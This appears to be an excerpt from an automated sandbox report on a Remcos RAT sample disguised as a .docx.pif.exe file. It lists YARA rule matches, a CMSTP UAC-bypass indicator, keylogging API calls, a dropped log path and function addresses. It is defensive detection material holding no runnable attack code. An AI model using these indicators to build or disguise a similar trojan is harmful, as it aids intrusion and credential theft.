Code function: 15_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

15_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041C9E2 SystemParametersInfoW,

15_2_0041C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.7570000.8.raw.unpack, -Module-.cs

Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

15_2_004167B4

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0270D4FC	0_2_0270D4FC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_04766420	0_2_04766420
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_047644D8	0_2_047644D8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_04764D48	0_2_04764D48
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0476C6B8	0_2_0476C6B8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_04765FE8	0_2_04765FE8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_04764910	0_2_04764910
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_04764900	0_2_04764900
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_06AEBD00	0_2_06AEBD00
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_06AEC747	0_2_06AEC747
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_06AE935C	0_2_06AE935C
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_06AE0040	0_2_06AE0040
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075607C8	0_2_075607C8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0756DA88	0_2_0756DA88
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075669F0	0_2_075669F0
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075651E8	0_2_075651E8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07569039	0_2_07569039
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075638D6	0_2_075638D6
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07567E40	0_2_07567E40
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07567E39	0_2_07567E39
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07567D18	0_2_07567D18
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07567D09	0_2_07567D09
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0756CC78	0_2_0756CC78
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_07564A7C	0_2_07564A7C
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_0756D228	0_2_0756D228
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075672F8	0_2_075672F8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075672EA	0_2_075672EA
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075691DB	0_2_075691DB
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075669EA	0_2_075669EA
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 0_2_075669AA	0_2_075669AA
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_012AD4FC	10_2_012AD4FC
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_04AE44D8	10_2_04AE44D8
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_04AE6420	10_2_04AE6420
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_04AE4D48	10_2_04AE4D48
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_04AE5FE8	10_2_04AE5FE8
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_04AE4910	10_2_04AE4910
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 10_2_04AEBA00	10_2_04AEBA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0043E0CC	15_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0041F0FA	15_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00454159	15_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00438168	15_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_004461F0	15_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0043E2FB	15_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0045332B	15_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0042739D	15_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_004374E6	15_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0043E558	15_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00438770	15_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_004378FE	15_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00433946	15_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0044D9C9	15_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00427A46	15_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0041DB62	15_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00427BAF	15_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00437D33	15_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00435E5E	15_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00426E0E	15_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0043DE9D	15_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00413FCA	15_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00436FEA	15_2_00436FEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 00401E65 appears 34 times

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2097614968.0000000007570000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2090587002.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2097704677.00000000075FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2097030538.0000000006E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000000.2042879669.00000000004BA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameznIq.exe0 vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Binary or memory string: OriginalFilenameznIq.exe0 vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
